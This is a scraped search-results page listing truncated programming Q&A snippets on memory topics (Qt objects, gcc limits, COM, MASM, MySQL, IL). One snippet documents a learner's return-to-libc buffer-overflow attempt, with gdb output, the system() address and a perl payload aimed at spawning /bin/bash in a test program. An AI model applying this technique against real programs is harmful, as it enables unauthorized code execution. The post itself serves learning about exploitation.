Search Results

Search found 13869 results on 555 pages for 'memory dump'.

Page 234/555 | < Previous Page | 230 231 232 233 234 235 236 237 238 239 240 241  | Next Page >

  • Penalty of using QGraphicsObject vs QGraphicsItem?

    - by Dutch
    I currently have a hierarchy of items based off of QGraphicsItem. I want to move to QGraphicsObject instead so that I can put properties on my items. I will not be making use of signals/slots or any other features of QObject. I'm told that you shouldn't derive from QObject because it's "heavy" and "slow". To test the impact, I derive from QGraphicsObject, add a couple properties to my items, and look at the memory usage of the running app. I create 1000 items using both flavors and I don't notice anything more than 10k more memory usage. Since all I am adding on to my items are properties, is it safe to say that QObject only adds weight if you are using signals/slots?

    Read the article

  • Problem with return 2 libc method

    - by jth
    Hi, I'am trying to understand the return2libc method. I'am using an ubuntu linux 9.10, 32 bit with ASLR disabled. In theory, it sounds quite easy, overwrite the saved eip with the address of system() (or whatever function you want), then put the address to which system() should return and after that, the parameter for system, the "/bin/bash"-string. But what happens is that my exploit keeps segfaulting the vulnerable program. I assume something with the system()-address went wrong. This is what I did so far: Determined the address of system(): (gdb) print system $1 = {<text variable, no debug info>} 0x167020 <system> (gdb) x/x system 0x167020 <system>: 0x890cec83 I used the subsequent x/x system because those 3 bytes returned by print system looks like an index in some sort of jumptable (PLT?), so I assume 0x890cec83 is the right address which is used to overwrite the saved eip. After that I determined the address of the /bin/bash string in memory, using a small C program which basically consists of this line: printf("Address of string /bin/bash: %p\n", getenv("SHELL")); Then I looked a little bit around in the memory and fount /bin/bash: (gdb) x/s 0xbffff6ca 0xbffff6ca: "/bin/bash" After I gathered this information, I filled the buffer: (gdb) b 9 Breakpoint 1 at 0x8048407: file victim.c, line 9. (gdb) r `perl -e 'print "A"x9 . "\x83\xec\x0c\x89FAKE\xca\f6\ff\bf";'` Breakpoint 1, main (argc=1111638594, argv=0xc360cca) at victim.c:10 10 return 0; (gdb) x/s 0xbffff6ca 0xbffff6ca: "/bin/bash" Stack frame looks like this: (gdb) i f Stack level 0, frame at 0xbffff440: eip = 0x8048407 in main (victim.c:10); saved eip 0x890cec83 source language c. Arglist at 0xbffff438, args: argc=1111638594, argv=0xc360cca Locals at 0xbffff438, Previous frame's sp is 0xbffff440 Saved registers: ebp at 0xbffff438, eip at 0xbffff43c This seems all right to me, saved eip was overwritten with the (hopefully) correct system()-address, return address for system was set to "FAKE" (shouldn't matter) and the address of /bin/bash also seems to be correct. When I'am continuing the execution, victim segfaults on some strange address and certainly not in 0x890cec83: (gdb) cont Continuing. Program received signal SIGSEGV, Segmentation fault. 0x0804840d in main (argc=Cannot access memory at address 0x41414149 ) at victim.c:11 11 } Has anyone an explanation or a hint what happens here and why the execution isn't redirected to 0x890cec83? Thanks in advance, any hint, and be it only vague, would be appreciated. I have no idea why this doesn't work.

    Read the article

  • gcc/g++: error when compiling large file

    - by Alexander
    Hi, I have a auto-generated C++ source file, around 40 MB in size. It largely consists of push_back commands for some vectors and string constants that shall be pushed. When I try to compile this file, g++ exits and says that it couldn't reserve enough virtual memory (around 3 GB). Googling this problem, I found that using the command line switches --param ggc-min-expand=0 --param ggc-min-heapsize=4096 may solve the problem. They, however, only seem to work when optimization is turned on. 1) Is this really the solution that I am looking for? 2) Or is there a faster, better (compiling takes ages with these options acitvated) way to do this? Best wishes, Alexander Update: Thanks for all the good ideas. I tried most of them. Using an array instead of several push_back() operations reduced memory usage, but as the file that I was trying to compile was so big, it still crashed, only later. In a way, this behaviour is really interesting, as there is not much to optimize in such a setting -- what does the GCC do behind the scenes that costs so much memory? (I compiled with deactivating all optimizations as well and got the same results) The solution that I switched to now is reading in the original data from a binary object file that I created from the original file using objcopy. This is what I originally did not want to do, because creating the data structures in a higher-level language (in this case Perl) was more convenient than having to do this in C++. However, getting this running under Win32 was more complicated than expected. objcopy seems to generate files in the ELF format, and it seems that some of the problems I had disappeared when I manually set the output format to pe-i386. The symbols in the object file are by standard named after the file name, e.g. converting the file inbuilt_training_data.bin would result in these two symbols: binary_inbuilt_training_data_bin_start and binary_inbuilt_training_data_bin_end. I found some tutorials on the web which claim that these symbols should be declared as extern char _binary_inbuilt_training_data_bin_start;, but this does not seem to be right -- only extern char binary_inbuilt_training_data_bin_start; worked for me.

    Read the article

  • Where to start when programming process synchronization algorithms like clone/fork, semaphores

    - by David
    I am writing a program that simulates process synchronization. I am trying to implement the fork and semaphore techniques in C++, but am having trouble starting off. Do I just create a process and send it to fork from the very beginning? Is the program just going to be one infinite loop that goes back and forth between parent/child processes? And how do you create the idea of 'shared memory' in C++, explicit memory address or just some global variable? I just need to get the overall structure/idea of the flow of the program. Any references would be appreciated.

    Read the article

  • Qt vs .NET - a few comparisons [closed]

    - by Pirate for Profit
    Event Handling In Qt the event handling system you just emit signals when something cool happens and then catch them in slots, for instance emit valueChanged(int percent, bool something); and void MyCatcherObj::valueChanged(int p, bool ok){} blocking them and disconnecting them when needed, doing it across threads... once you get the hang of it, it just seems a lot more natural and intuitive than the way the .NET event handling is set up (you know, object sender, CustomEventArgs e). And I'm not just talking about syntax, because in the end the .NET delegate crap is the bomb. I'm also talking about in more than just reflection (because, yes, .NET obviously has much stronger reflection capabilities). I'm talking about in the way the system feels to a human being. Qt wins hands down i m o. Basically, the footprints make more sense and you can visualize the project easier without the clunky event handling system. I wish I could it explain it better. The only thing is, I do love some of the ease of C# compared to C++ and .NET's assembly architecture. That is a big bonus for modular projects, which are a PITA to do in C++. Database Ease of Doing Crap Also what about datasets and database manipulations. I think .net wins here but I'm not sure. Threading/Conccurency How do you guys think of the threading? In .NET, all I've ever done is make like a list of master worker threads with locks. I like QConcurrentFramework, you don't worry about locks or anything, and with the ease of the signal slot system across threads it's nice to get notified about the progress of things. Memory Usage Also what do you think of the overall memory usage comparison. Is the .NET garbage collector pretty on the ball and quick compared to the instantaneous nature of native memory management? Or does it just let programs leak up a storm and lag the computer then clean it up when it's about to really lag? However, I am a n00b who doesn't know what I'm talking about, please school me on the subject.

    Read the article

  • Iphone App Similar to the Talking Larry Application

    - by Zeeshan
    I am developing iphone application similar to the Talking Larry Application. I am facing an issue of Low Memory when i pre-load the animations into an NSMutable Array. If i do not pre-load the animations and load it into the Animation Images when the user touch the button then it takes Time and it play back the animation very Slow. And during video making it does not play the complete animations. How can i resolve this issue. I want to play back the animations similar to the Talking Larry app and do not want to get Low Memory Issue.

    Read the article

  • Writing to Samba share as different user?

    - by Hamid Elaosta
    I have a Samba share on my NAS drive mounter as follows: mount -t smbfs -o username=backup,password=backups_password //sharebox/SVNBackup /mnt/SVNBackup I am then trying to run: sudo svnadmin dump /usr/local/svn/repos/testrepo > /mnt/SVNBackup/test1.svn but I get: bash: /mnt/SVNBackup/test1.svn: Permission Denied The backup location is setup to accept access only from the user "backup" (who doesn't exist on the local system) How do I go about solving this problem? Thanks

    Read the article

  • While loop in IL - why stloc.0 and ldloc.0?

    - by Michael Stum
    I'm trying to understand how a while loop looks in IL. I have written this C# function: static void Brackets() { while (memory[pointer] > 0) { // Snipped body of the while loop, as it's not important } } The IL looks like this: .method private hidebysig static void Brackets() cil managed { // Code size 37 (0x25) .maxstack 2 .locals init ([0] bool CS$4$0000) IL_0000: nop IL_0001: br.s IL_0012 IL_0003: nop // Snipped body of the while loop, as it's not important IL_0011: nop IL_0012: ldsfld uint8[] BFHelloWorldCSharp.Program::memory IL_0017: ldsfld int16 BFHelloWorldCSharp.Program::pointer IL_001c: ldelem.u1 IL_001d: ldc.i4.0 IL_001e: cgt IL_0020: stloc.0 IL_0021: ldloc.0 IL_0022: brtrue.s IL_0003 IL_0024: ret } // end of method Program::Brackets For the most part this is really simple, except for the part after cgt. What I don't understand is the local [0] and the stloc.0/ldloc.0. As far as I see it, cgt pushes the result to the stack, stloc.0 gets the result from the stack into the local variable, ldloc.0 pushes the result to the stack again and brtrue.s reads from the stack. What is the purpose of doing this? Couldn't this be shortened to just cgt followed by brtrue.s?

    Read the article

  • what's faster: merging lists or dicts in python?

    - by tipu
    I'm working with an app that is cpu-bound more than memory bound, and I'm trying to merge two things whether they be sets or dicts. Now the thing is i can choose either one, but I'm wondering if merging dicts would be faster since it's all in memory? Or is it always going to be O(n), n being the size of the smaller set. The reason I asked about dicts rather than sets is because I can't convert a set to json, because that results in {key1, key2, key3} and json needs a key/value pair, so I am using a dict so json dumps returns {key1:1, key2:1, key3:1}. Yes this is wasteful, but if it proves to be faster then I'm okay with it.

    Read the article

  • process killed -- delete output file?

    - by user13743
    I have a bash script that runs on our shared web host. It does a dump of our mysql database and zips up the output file. Sometimes the mysqldump process gets killed, which leaves an incomplete sql file that still gets zipped. How do I get my script to 'notice' the killing and then delete the output file if the killing occurred?

    Read the article

  • Some basic COM question...

    - by smwikipedia
    I have just finished my first COM server DLL. And it runs smoothly. So I'd like to show my understanding for now and hear your critics. 1- How COM simply works? COM - "The Call Chain" COM Lib methods - Traditional DLL exports - Classes encapsulated in the COM DLL 2- With C++, the benefits like "interface" in OOP can only be taken advantage of at the source level. With COM, these benefits can be used at a binary level. 3- Some illustration about interface &pInterface ------- pInterface ---------- Interface----------------- methods Ixx ** Ixx * (method table) (void **) A Interface is a data structure in memory. It's nothing but a memory area containg a method table. Is my understanding alright? Thanks for your revision.

    Read the article

  • Question about "Link Map" output and "Assume" directive of MASM assembler.

    - by smwikipedia
    I am new to MASM. So the questions may be quite basic. When I am using the MASM assembler, there's an output file called "Link Map". Its content is composed of the starting offset and length of various segments, such as Data segment, Code segment and Stack segment. I am wondering that, where are these information describing? Are they talking about how various segments are located within an EXE file or, how segments are located within memory after the EXE file being loaded into memory by a program loader? BTW: What does the "Assume" directive do? My understanding is that it tell the assembler to emit some information into the exe file header so the program loader could use it to set DS, CS, SS, ES register accordingly. Am I right on this? Thanks in advance.

    Read the article

  • Cannot load from mysql.proc

    - by Timo Schneider
    I can not dump my MySQL-Databeses, however here's the error message: Cannot load from mysql.proc. The table is probably corrupted Also mysql_upgrade seems not to work: # mysql_upgrade Looking for 'mysql' as: mysql Looking for 'mysqlcheck' as: mysqlcheck Running 'mysqlcheck with default connection arguments mysqlcheck: Got error: 1045: Access denied for user 'root'@'localhost' (using password: NO) when trying to connect FATAL ERROR: Upgrade failed What does that mean ?

    Read the article

  • create a list of threads in C

    - by Hristo
    My implementation (in C) isn't working... the first node is always NULL so I can't free the memory. I'm doing: thread_node_t *thread_list_head = NULL; // done in the beginning of the program ... // later on in the program thread_node_t *thread = (thread_node_t*) malloc(sizeof(thread_node_t)); pthread_create(&(thread->thread), NULL, client_thread, &csFD); thread->next = thread_list_head; thread_list_head = thread; So when I try to free this memory, thread_list_head is NULL. while (thread_list_head != NULL) { thread_node_t *temp = thread_list_head; thread_list_head = thread_list_head->next; free(temp); temp = NULL; } Any advice on how to fix this or just a new way to create this list that would work better? Thanks, Hristo

    Read the article

  • Texture allocations being doubled in iPhone OpenGL ES

    - by Kyle
    The below couple lines are called 15 times during initialization. The tx-size is reported at 512 everytime, so this will allocate a 1mb image in memory 15 times, for a total of 15mb used.. However, I noticed instruments is reporting a total of 31 allocations! (15*2)+1 glTexImage2D(GL_TEXTURE_2D, 0, GL_RGBA, tx-size, tx-size, 0, GL_RGBA, GL_UNSIGNED_BYTE, spriteData); free(spriteData); Likewise in another area of my program that allocates 6 256x256x4 (256kB) textures.. I see 13 sitting there. (6*2)+1 Anyone know what's going on here? It seems like awful memory management, and I really hope it's my fault. Just to let everyone know, I'm on the simulator.

    Read the article

  • streaming XML serialization in .net

    - by Luca Martinetti
    Hello, I'm trying to serialize a very large IEnumerable<MyObject> using an XmlSerializer without keeping all the objects in memory. The IEnumerable<MyObject> is actually lazy.. I'm looking for a streaming solution that will: Take an object from the IEnumerable<MyObject> Serialize it to the underlying stream using the standard serialization (I don't want to handcraft the XML here!) Discard the in memory data and move to the next I'm trying with this code: using (var writer = new StreamWriter(filePath)) { var xmlSerializer = new XmlSerializer(typeof(MyObject)); foreach (var myObject in myObjectsIEnumerable) { xmlSerializer.Serialize(writer, myObject); } } but I'm getting multiple XML headers and I cannot specify a root tag <MyObjects> so my XML is invalid. Any idea? Thanks

    Read the article

  • Efficient banner rotation with PHP

    - by reggie
    I rotate a banner on my site by selecting it randomly from an array of banners. Sample code as demonstration: <?php $banners = array( '<iframe>...</iframe>', '<a href="#"><img src="#.jpg" alt="" /></a>', //and so on ); echo $banners(rand(0, count($banners))); ?> The array of banners has become quite big. I am concerned with the amount of memory that this array adds to the execution of my page. But I can't figure out a better way of showing a random banner without loading all the banners into memory...

    Read the article

  • Algorithm: How to tell if an array is a permutation in O(n)?

    - by Iulian Serbanoiu
    Hello, Input: A read-only array of N elements containing integer values from 1 to N. And a memory zone of a fixed size (10, 100, 1000 etc - not depending on N). How to tell in O(n) if the array represents a permutation? --What I achieved so far:-- I use the limited memory area to store the sum and the product of the array. I compare the sum with N*(N+1)/2 and the product with N! I know that if condition (2) is true I might have a permutation. I'm wondering if there's a way to prove that condition (2) is sufficient to tell if I have a permutation. So far I haven't figured this out ... Thanks, Iulian

    Read the article

  • MySQL query cache vs caching result-sets in the application layer

    - by GetFree
    I'm running a php/mysql-driven website with a lot of visits and I'm considering the possibility of caching result-sets in shared memory in order to reduce database load. However, right now MySQL's query cache is enabled and it seems to be doing a pretty good job since if I disable query caching, the use of CPU jumps to 100% immediately. Given that situation, I dont know if caching result-sets (or even the generated HTML code) locally in shared memory with PHP will result in any noticeable performace improvement. Does anyone out there have any experience on this matter? PS: Please avoid suggesting heavy-artillery solutions like memcached. Right now I'm looking for simple solutions that dont require too much time to implement, deploy and maintain.

    Read the article

  • Handling exception form unmanaged dll in C#

    - by StuffHappens
    Hello. I have the following function written in C# public static string GetNominativeDeclension(string surnameNamePatronimic) { if(surnameNamePatronimic == null) throw new ArgumentNullException("surnameNamePatronimic"); IntPtr[] ptrs = null; try { ptrs = StringsToIntPtrArray(surnameNamePatronimic); int resultLen = MaxResultBufSize; int err = decGetNominativePadeg(ptrs[0], ptrs[1], ref resultLen); ThrowException(err); return IntPtrToString(ptrs, resultLen); } catch { return surnameNamePatronimic; } finally { FreeIntPtr(ptrs); } } Function decGetNominativePadeg is in unmanaged dll [DllImport("Padeg.dll", EntryPoint = "GetNominativePadeg")] private static extern Int32 decGetNominativePadeg(IntPtr surnameNamePatronimic, IntPtr result, ref Int32 resultLength); and throws an exception: Attempted to read or write protected memory. This is often an indication that other memory is corrupt. The catch that is in C# code doesn't actually catch it. Why? How to handle this exception? Thank you for your help!

    Read the article

  • J2ME Reduce Image color-depth/ Compress Image size

    - by updateraj
    Hi, I need to transmit the image from the mobile phone to the server. I am able to reduce the image screen size but not the memory size. I understand i have to deal with the color depth. J2ME does not seem to offer any scaling method which is available in J2SE: image rescaled = image.getScaledInstance(thumbWidth, thumbHeight, Image.SCALE_AREA_AVERAGING); BufferedImage biRescaled = toBufferedImage(rescaled, thumbWidth, thumbHeight, BufferedImage.TYPE_INT_RGB); How i would i tackle this ? I would like to reduce the image memory size before i transmit to the server. Thank you

    Read the article

  • I don't understand Application Domains

    - by Jeremy Edwards
    .NET has this concept of Application Domains which from what I understand can be used to load an assembly into memory. I've done some research on Application Domains as well as go to my local book store for some additional knowledge on this subject matter but it seems very scarce. All I know that I can do with Application Domains is to load assemblies in memory and I can unload them when I want. What are the capabilities other that I have mentioned of Application Domains? Do Threads respect Application Domains boundaries? Are there any drawbacks from loading Assemblies in different Application Domains other than the main Application Domains beyond performance of communication? Links to resources that discuss Application Domains would be nice as well. I've already checked out MSDN which doesn't have that much information about them.

    Read the article

  • How can I do daily backups for my VisualSVN Repos?

    - by Tyler
    How can I do daily backups for my VisualSVN Repos? Its on a Windows Server 2003 machine with VisualSVN Server, I was thinking about just doing an xcopy of the folder C:\Repo but I'm not familiar enough with svn to know if that will cause issues. Should I use dump or hotcopy or both?

    Read the article

  • Can GPU capabilities impact virtual machine performance?

    - by Dave White
    While this many not seem like a programming question directly, it impacts my development activities and so it seems like it belongs here. It seems that more and more developers are turning to virtual environments for development activities on their computers, SharePoint development being a prime example. Also, as a trainer, I have virtual training environments for all of the classes that I teach. I recently purchased a new Dell E6510 to travel around with. It has the i7 620M (Dual core, HyperThreaded cpu running at 2.66GHz) and 8 GB of memory. Reading the spec sheet, it sounded like it would be a great laptop to carry around and run virtual machines on. Getting the laptop though, I've been pretty disappointed with the user experience of developing in a virtual machine. Giving the Virtual Machine 4 GB of memory, it was slow and I could type complete sentences and watch the VM "catchup". My company has training laptops that we provide for our classes. They are Dell Precision M6400 Intel Core 2 Duo P8700 running at 2.54Ghz with 8 GB of memory and the experience on this laptops is night and day compared to the E6510. They are crisp and you barely aware that you are running in a virtual environment. Since the E6510 should be faster in all categories than the M6400, I couldn't understand why the new laptop was slower, so I did a component by component comparison and the only place where the E6510 is less performant than the M6400 is the graphics department. The M6400 is running a nVidia FX 2700m GPU and the E6510 is running a nVidia 3100M GPU. Looking at benchmarks of the two GPUs suggest that the FX 2700M is twice as fast as the 3100M. http://www.notebookcheck.net/Mobile-Graphics-Cards-Benchmark-List.844.0.html 3100M = 111th (E6510) FX 2700m = 47th (Precision M6400) Radeon HD 5870 = 8th (Alienware) The host OS is Windows 7 64bit as is the guest OS, running in Virtual Box 3.1.8 with Guest Additions installed on the guest. The IDE being used in the virtual environment is VS 2010 Premium. So after that long setup, my question is: Is the GPU significantly impacting the virtual machine's performance or are there other factors that I'm not looking at that I can use to boost the vm's performance? Do we now have to consider GPU performance when purchasing laptops where we expect to use virtualized development environments? Thanks in advance. Cheers, Dave

    Read the article

  • What is the best way to implement an object cache with Entity Framework?

    - by Harshal
    Say I have a table of "BlogPosts" in a database and i want to be able to cache the ones that were retrieved already in memory, for further reads, I can just use a standard hashtable type memory cache like System.Web.Caching.Cache, but if i then need to update a property on one of these blog posts e.g. blogPost.Title and update the record in DB, i cannot do this without fetching it again from database as the Entity Framework context used to fetch this record when it was loaded into my cache is already disposed? How do I write code so that I am getting an object from my cache, updating one property and just calling the SaveChanges method without incurring an extra read.

    Read the article

< Previous Page | 230 231 232 233 234 235 236 237 238 239 240 241  | Next Page >